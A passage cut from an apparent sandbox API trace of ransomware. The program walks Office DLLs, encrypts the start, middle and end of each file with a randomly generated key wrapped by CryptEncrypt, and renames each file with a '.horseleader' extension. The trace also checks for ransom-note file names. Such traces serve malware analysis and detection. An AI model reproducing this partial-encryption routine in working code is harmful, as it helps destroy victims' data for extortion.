out: hHeap=0x780000) returned 1 [0245.184] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1570ec00, ftCreationTime.dwHighDateTime=0x1cbc479, ftLastAccessTime.dwLowDateTime=0xe5d21520, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x1570ec00, ftLastWriteTime.dwHighDateTime=0x1cbc479, nFileSizeHigh=0x0, nFileSizeLow=0xb7ba8, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="PJ11OD11.DLL", cAlternateFileName="")) returned 1 [0245.184] lstrcmpiW (lpString1="PJ11OD11.DLL", lpString2="Windows") returned -1 [0245.184] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PJ11OD11.DLL") returned 72 [0245.184] StrStrIW (lpFirst="PJ11OD11.DLL", lpSrch=".horseleader") returned 0x0 [0245.184] lstrcmpW (lpString1="PJ11OD11.DLL", lpString2="#Decrypt#.txt") returned 1 [0245.184] lstrcmpW (lpString1="PJ11OD11.DLL", lpString2="_uninstalling_.png") returned 1 [0245.184] lstrlenW (lpString=".testttjffg") returned 11 [0245.184] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PJ11OD11.DLL", lpSrch=".testttjffg") returned 0x0 [0245.184] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.184] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.185] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PJ11OD11.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\pj11od11.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0245.186] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PJ11OD11.DLL") returned 72 [0245.186] StrStrW (lpFirst="PJ11OD11.DLL", lpSrch=".txt") returned 0x0 [0245.186] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=752552) returned 1 [0245.187] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.187] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.190] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.190] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.190] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x595d4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.191] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.195] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.195] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.196] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xb2ba8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.196] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.198] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.198] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.199] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.199] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0245.199] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0245.199] CloseHandle (hObject=0x158) returned 1 [0245.199] GetProcessHeap () returned 0x780000 [0245.199] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0245.199] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PJ11OD11.DLL.horseleader") returned 84 [0245.199] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PJ11OD11.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\pj11od11.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PJ11OD11.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\pj11od11.dll.horseleader")) returned 1 [0245.201] GetProcessHeap () returned 0x780000 [0245.201] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0245.201] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9a461000, ftCreationTime.dwHighDateTime=0x1cb7018, ftLastAccessTime.dwLowDateTime=0xe5d47680, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x9a461000, ftLastWriteTime.dwHighDateTime=0x1cb7018, nFileSizeHigh=0x0, nFileSizeLow=0x3fb90, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="PJRESC.DLL", cAlternateFileName="")) returned 1 [0245.201] lstrcmpiW (lpString1="PJRESC.DLL", lpString2="Windows") returned -1 [0245.201] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PJRESC.DLL") returned 70 [0245.201] StrStrIW (lpFirst="PJRESC.DLL", lpSrch=".horseleader") returned 0x0 [0245.201] lstrcmpW (lpString1="PJRESC.DLL", lpString2="#Decrypt#.txt") returned 1 [0245.201] lstrcmpW (lpString1="PJRESC.DLL", lpString2="_uninstalling_.png") returned 1 [0245.201] lstrlenW (lpString=".testttjffg") returned 11 [0245.201] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PJRESC.DLL", lpSrch=".testttjffg") returned 0x0 [0245.201] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.201] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.202] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PJRESC.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\pjresc.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0245.202] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PJRESC.DLL") returned 70 [0245.202] StrStrW (lpFirst="PJRESC.DLL", lpSrch=".txt") returned 0x0 [0245.202] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=261008) returned 1 [0245.202] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.203] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.205] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.206] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.207] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x1d5c8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.207] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.208] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.208] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.208] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x3ab90, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.208] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.210] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.210] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.210] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.210] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0245.210] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0245.211] CloseHandle (hObject=0x158) returned 1 [0245.211] GetProcessHeap () returned 0x780000 [0245.211] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0245.211] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PJRESC.DLL.horseleader") returned 82 [0245.211] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PJRESC.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\pjresc.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PJRESC.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\pjresc.dll.horseleader")) returned 1 [0245.212] GetProcessHeap () returned 0x780000 [0245.212] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0245.212] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x74bd800, ftCreationTime.dwHighDateTime=0x1cb71c8, ftLastAccessTime.dwLowDateTime=0xe5d93940, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x74bd800, ftLastWriteTime.dwHighDateTime=0x1cb71c8, nFileSizeHigh=0x0, nFileSizeLow=0x3c2b90, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="PRJRES.DLL", cAlternateFileName="")) returned 1 [0245.212] lstrcmpiW (lpString1="PRJRES.DLL", lpString2="Windows") returned -1 [0245.213] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PRJRES.DLL") returned 70 [0245.213] StrStrIW (lpFirst="PRJRES.DLL", lpSrch=".horseleader") returned 0x0 [0245.213] lstrcmpW (lpString1="PRJRES.DLL", lpString2="#Decrypt#.txt") returned 1 [0245.213] lstrcmpW (lpString1="PRJRES.DLL", lpString2="_uninstalling_.png") returned 1 [0245.213] lstrlenW (lpString=".testttjffg") returned 11 [0245.213] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PRJRES.DLL", lpSrch=".testttjffg") returned 0x0 [0245.213] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.213] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.213] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PRJRES.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\prjres.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0245.215] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PRJRES.DLL") returned 70 [0245.215] StrStrW (lpFirst="PRJRES.DLL", lpSrch=".txt") returned 0x0 [0245.215] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=3943312) returned 1 [0245.215] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.215] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.218] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.218] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.219] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x1dedc8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.220] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.222] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.223] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.223] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x3bdb90, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.223] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.227] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.227] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.227] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.227] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0245.227] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0245.227] CloseHandle (hObject=0x158) returned 1 [0245.228] GetProcessHeap () returned 0x780000 [0245.228] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0245.228] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PRJRES.DLL.horseleader") returned 82 [0245.228] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PRJRES.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\prjres.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PRJRES.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\prjres.dll.horseleader")) returned 1 [0245.229] GetProcessHeap () returned 0x780000 [0245.229] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0245.229] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4a199a00, ftCreationTime.dwHighDateTime=0x1cba5d5, ftLastAccessTime.dwLowDateTime=0xdac16060, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x4a199a00, ftLastWriteTime.dwHighDateTime=0x1cba5d5, nFileSizeHigh=0x0, nFileSizeLow=0x1c8b68, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="RICHED20.DLL", cAlternateFileName="")) returned 1 [0245.229] lstrcmpiW (lpString1="RICHED20.DLL", lpString2="Windows") returned -1 [0245.229] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\RICHED20.DLL") returned 72 [0245.229] StrStrIW (lpFirst="RICHED20.DLL", lpSrch=".horseleader") returned 0x0 [0245.229] lstrcmpW (lpString1="RICHED20.DLL", lpString2="#Decrypt#.txt") returned 1 [0245.229] lstrcmpW (lpString1="RICHED20.DLL", lpString2="_uninstalling_.png") returned 1 [0245.229] lstrlenW (lpString=".testttjffg") returned 11 [0245.229] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\RICHED20.DLL", lpSrch=".testttjffg") returned 0x0 [0245.229] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.230] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.230] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\RICHED20.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\riched20.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0245.230] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\RICHED20.DLL") returned 72 [0245.231] StrStrW (lpFirst="RICHED20.DLL", lpSrch=".txt") returned 0x0 [0245.231] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=1870696) returned 1 [0245.231] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.231] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.234] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.234] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.234] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xe1db4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.234] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.238] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.238] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.238] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x1c3b68, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.238] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.241] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.241] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.242] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.242] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0245.242] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0245.243] CloseHandle (hObject=0x158) returned 1 [0245.243] GetProcessHeap () returned 0x780000 [0245.243] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0245.243] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\RICHED20.DLL.horseleader") returned 84 [0245.243] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\RICHED20.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\riched20.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\RICHED20.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\riched20.dll.horseleader")) returned 1 [0245.245] GetProcessHeap () returned 0x780000 [0245.245] HeapFree (in: hHeap=0x780000, 